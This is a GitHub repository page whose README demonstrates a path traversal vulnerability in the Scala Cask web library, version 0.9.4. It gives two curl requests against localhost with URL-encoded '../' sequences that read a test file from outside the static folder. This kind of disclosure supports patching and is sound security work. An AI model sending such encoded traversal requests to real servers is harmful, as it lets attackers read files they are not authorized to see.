Skip to content

Maeeen/cask-static-path-traversal-issue

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
project
project
 
 
src/main/scala
src/main/scala
 
 
static
static
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
build.sbt
build.sbt
 
 
hi.txt
hi.txt
 
 

Repository files navigation

Showcasing simple path traversal issue on Cask 0.9.4

  • sbt run
  • curl http://localhost:8080/static/%2E%2E%2Fhi.txt
    • Outputs Got me… from hi.txt instead of Hi! from static/hi.txt
    • curl http://localhost:8080/static/..%2F/hi.txt works as well
  • Tested on: HotSpot 17+35-LTS-2724, OpenJDK 11.0.25, OpenJDK 21.0.5

About

This repository showcases a vulnerability in the Scala's Cask library where path traversal could be done

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages